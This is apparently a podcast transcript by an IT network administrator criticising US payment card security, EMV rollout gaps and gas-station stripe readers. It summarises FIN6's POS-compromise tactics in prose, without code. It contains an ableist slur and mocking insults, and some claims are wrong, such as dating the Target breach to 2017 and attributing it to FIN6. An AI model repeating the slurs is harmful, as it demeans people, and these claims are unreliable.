Let’s talk about Payment Card Security.
I am especially going to harp on all those gas stations that have their chip readers duct taped or marked with post it notes written by some retard with a crayon that says “no chip, swipe here…” More like, “wipe your ass here with our poor security practices.”
So how about some general facts about payment cards to kick this off…
According to the CFPB Consumer Credit Card Market Study, there are approximately 160 Million Credit Card Holders in the US, and as of 2017, there were approximately 14.4 billion credit cards in circulation across the globe. Consumers with an average credit score of 620+ have at least four credit cards. There are over half a million applications for credit cards per day in the United States. Crazy.
The frequency of online payments is growing. According to statistics provided by the US Census Bureau, between 2013 and 2017, online payments in the United States have grown four times as much as retail payments. Across the globe, the average person makes approximately 19 online transactions using a payment card per calendar year. We’re talking globally, so I assume this includes nomadic huntsmen and sheep-loving shepherds from arid desert regions too. I don’t know, they weren’t specific, but I know I made more than 19 transactions over the last year.
2016 represents the first year where incidents of online fraud (58%) surpassed “in-person” fraud. It’s a trend that will continue. Consumer confidence is low, and people don’t believe their data is safe when making online purchases. According to a Pew Research Center Survey, only ~10% of Americans are very confident that the websites they shop at are keeping their credit card information secure. Surprisingly, another study found that 10% of people are morons.
Here’s where it starts to get interesting. According to the global news bureau Quartz, America is responsible for approximately one-quarter of the global payment card transaction volume, but accounts for nearly half of all worldwide credit card fraud. Merchants are explicitly warned to consider the ramifications of fraud on their operations when selling in the United States. Now, the global payment gateway and payment management company CyberSource indicates that online merchants report the most effective tools to fight payment card fraud to be AVS and CVV Filters. We all know what those are, right? AVS is address validation and CVV is that little 3-digit number on the back of your card – it’s a card verification number. The American Express Digital Payments Survey indicates that only 53 percent of merchants require customers to enter their CVV for card validation upon checkout. In addition, only 39 percent of online merchants actually decline a transaction when the consumer’s billing address has not been provided.
Do we see a pattern emerging here? Statistically speaking, the theft-level of chip card data in the US is 868% higher than the rest of the world! “But what gives? EMV chip cards are supposed to be secure?”
All right, all right. Backup. So what is EMV? EMV stands for Europay, Mastercard, and Visa. It was later branded EMVco to represent additional members added to the consortium. These
cards were finally made available to US Consumers starting in 2015, give or take. EMV provides end-to-end encryption of cardholder data, and serves its purpose everywhere but here in the United States. They are designed to defeat payment card counterfeiting associated with magnetic stripe data.
By now you should be making the connection. The magnetic stripe readers are the devil. A study reported in May 2018 from the research firm Gemini Advisory found that financial institutions were successful in providing consumers with EMV-compliant credit and debit cards for use. They were mailed out pretty quick, as I recall. They also found that EMV technology did not eradicate card-present fraud whatsoever. Of more than 60-million payment cards stolen in the 12 months prior to the study, chip-enabled cards represented 93% of the total. 75% of these were compromised at point-of-sale machines. The results reflect the lack of US merchant compliance with the EMV implementation. Again, hey gas stations… no chip… wipe your ass here.
As a side note, you’re probably seen the news stories about card skimmers, or shimmers, at gas pumps in dark secluded areas, where you insert your card and the bad guys capture your data and you’re screwed. Technically, the shimmer mechanism is inserted as a man-in-the-middle type of attack between the EMV chip and the ATM or POS chip reader prior to any instance of tokenization. It reads what’s called track 1 and track 2 data, which is what was traditionally associated with 2 of the 3 bands which comprised the magnetic strip. The attacker can now clone your data to a magnetic stripe and merrily go to some non-compliant store with a stripe reader to buy beer and cigarettes. It’s the failure of merchants to be fully EMV-compliant that results in the theft and loss.
So to summarize this so far, we have merchants in card-present settings, like gas stations, who are dragging their feet about banning the magnetic stripe readers, or who don’t implement the full security of EMV. Or their chip reader breaks and they fall back to a magnetic reader. Then we have card-not-present, otherwise known as online transactions taking place, where merchants are doing an awfully crumby job of leveraging address and card verification filters in the manner prescribed. Europe has GDPR – that’s the General Data Protection Regulation law – which they rolled out in early 2018 against the objection of companies who said they could never modernize their processes to the extent necessary. But most of them did for fear of fines which would bankrupt small and medium-sized companies. Meanwhile the US has little regulation and we’re becoming a veritable laughing stock to the rest of the civilized world.
The government is doing nothing. There’s a large political sentiment in the US about avoiding government regulation and I’m not going to open a can of worms with that, but the only ones suffering from this lack of regulation right now are US citizens. Free markets are doing jack shit – Visa is trying I guess, but really it’s to protect their direct customer base if you think about it. Prior to 2015, credit card issuers were liable for a large majority of counterfeit chargebacks on card-present transactions, so the consortium got together and established a deadline in October 2015 to implement EMV-compliant POS systems in an effort to move liability for those chargebacks to the merchants or their payment processors. But of course, there were loopholes and realistically this lacks the force of any meaningful government oversight. Get this… if a merchant allows a person to swipe their card and it turns out to be fraudulent, as long as they have EMV enabled, they are not liable.
It’s the same mentality that so many companies have about security these days… “hey we need to pass the audit, let’s check the box, pass it, and not give a shit about proper security practices thereafter.” But I digress.
So long as I’m painting a bleak picture, let’s talk about what else makes absolutely no sense in regard to retail purchases in the US.
- You can still pay by check at most retailers. (Who the hell carries a checkbook with them to the store anymore?)
- If you go to a restaurant, you hand the waitress or waiter your payment card and they walk away with it. And then they proceed to write down your name, card number and CVS number. There was a restaurant here locally a couple years ago which ran a massive card theft operation and I doubt the conspirators were ever caught. I had family members and friends get compromised, and they had friends who got compromised. Mysterious charges appeared on their card from other states, so they were clearly selling the data for profit. I’d say the name of the restaurant, but… hold on, let me check with our producers here to see if we can… nevermind, it’s a no.
- Here in the US, EMV retailers may require chip + signature. I have no idea what the benefit to this is, but no one checks the signature on the back of your card. I mean, even if they did, are they forensic handwriting experts who can really tell the difference? You have teenagers with fake IDs and mugshots of Big Bird on them buying beer at these gas stations, how the hell are they going to tell the difference in signatures?
- Fact: Ex-Soviet Bloc countries in the EU have more advanced payment card protections than the US. I’m calling that out. Don’t @ me.
- British cyber-security expert Kevin Beaumont, aka “Gossi the Dog” likens travel to the US as having to “remember how things worked two decades ago” in terms of payment card security.
All right, who’s behind these attacks anyway? Let’s talk about that for a bit. I won’t bore everybody with the fine details – you can find links to official reports and the details of this case study on our Podcast website once it’s up and running – but the cybersecurity group FireEye published a report entitled “Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6” in April 2016. It is a pretty in-depth technical case study into the inner workings of one of the main threat actors who are responsible for a large number of POS system compromises over the last several years. The report is based on findings gathered through several Mandiant Consulting investigations into the hospitality and retail sectors where FIN6 was successful in compromising POS systems and stealing millions of payment card numbers.
So here’s the rub. FIN6 normally stumbles onto its targets by way of massive spam campaigns facilitated by the GRABNEW malware and similar variants. GRABNEW is a credential-stealing backdoor with form-grabbing capabilities and ability to inject code into specific web pages to mimic a valid login prompt for financial institutions to facilitate banking fraud. FireEye found that it is often employed by FIN6 in conjunction with POS malware payloads. FIN6 likely didn’t write the malware, but traded or purchased rights to it through the complex, seedy criminal underworld ecosystem.
After stumbling onto a target, the threat actors typically use components of the Metasploit framework to establish persistence. A common hallmark was to use a downloader program to connect to command and control servers to download and execute shellcode using either registry run keys or Windows scheduled tasks to establish persistence with the group’s preferred back doors.
After FIN6 establishes persistence, they may use public utilities like Windows Credential Editor for privilege escalation and credential harvesting. They have also used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the company’s Active Directory database, extract the hashes and crack them offline at their leisure to obtain domain admin.
Aside from this AD information, multiple tools are used to conduct reconnaissance of SQL databases and NETBIOS information. Once they’ve got you mapped-out, they begin lateral movement across the network using PsExec and Remote Command Executor tools to leverage the cracked passwords to gain a better foothold in the environment. FIN6 would commonly use the Pink command-line utility, which is part of the Putty SSH family of utilities, to create SSH tunnels to their C2 servers for routing RDP traffic for their threat actors’ administration, right under the noses of security folks who are too busy spending their work day attending to the company’s lost and found box or fixing physical badge readers that broke on the office supplies closet door.
So through this lateral movement, complete with NETBIOS recon because people still run that crap, the attackers identify the POS systems. At this stage, FIN6 would routinely deploy the TRINITY or FrameworkPOS malware using scheduled Windows tasks. The malware runs continuously, and targets system processes not listed in its accompanying process blacklist in an effort to stay one-step ahead of defenders. That’s a key reason why persistent C2 communications are so important. Anyway, TRINITY scans for payment card data signatures, and copies to a local file in a subdirectory within the C:\Windows directory.
Exfiltration from the targeted environment occurs via a script used by FIN6 to iterate a list of compromised POS systems and copy harvested track data files to a numbered log file before erasing the original data files for obfuscation. The log files are compressed into a .zip archive and moved to staging systems which are setup to send the stolen data to C2 servers using an FTP command-line utility (which is presumably encrypted). As a final note, FIN6 has also previously used methods to upload data to file sharing services rather than C2 servers. How do you like them apples?
At this point, you’re screwed because you went to Kwik Trip and paid for your yogurt parfait, 24-hour energy boost, and cigarettes with the damned magnetic stripe. Your track data is now being dumped along with hundreds of thousands or even millions of other oblivious cardholders’ records into dark web card shops for retail purchase by an unscrupulous but enterprising meth addict with high-speed internet access and a TOR browser in northwestern Mississippi. Probably.
The reality is, companies who are not EMV-compliant are the biggest targets. The attack methods previously described are not changing drastically. As more merchants slowly warm up to chip readers, researchers note that threat actors are just becoming more focused on places like gas stations who do not have a mandate to move to them until 2020. Why the EMV consortium gave gas stations so long to wait without risk of repercussion makes no sense to me, but don’t expect Kwik Trip to look out for your payment card security for another year and a half or more.
And if you don’t think it’s rampant, rewind the podcast and check those preliminary statistics again. The Home Depot breach in 2014 affected POS systems which compromised some 56 million credit and debit card numbers. This was actually larger than the 2017 Target breach, which compromised 40 million payment cards. That ironically was a FIN6 special, and the company had just implemented new FireEye security mechanisms, but no one knew how to use them properly. Wow, if that doesn’t sound familiar to so many IT folks.
To close, in the immortal words of Andy Rooney, “If dogs could talk it would take a lot of the fun out of owning one.”
Stuck-in-Active: Journal of an IT-Network Administrator 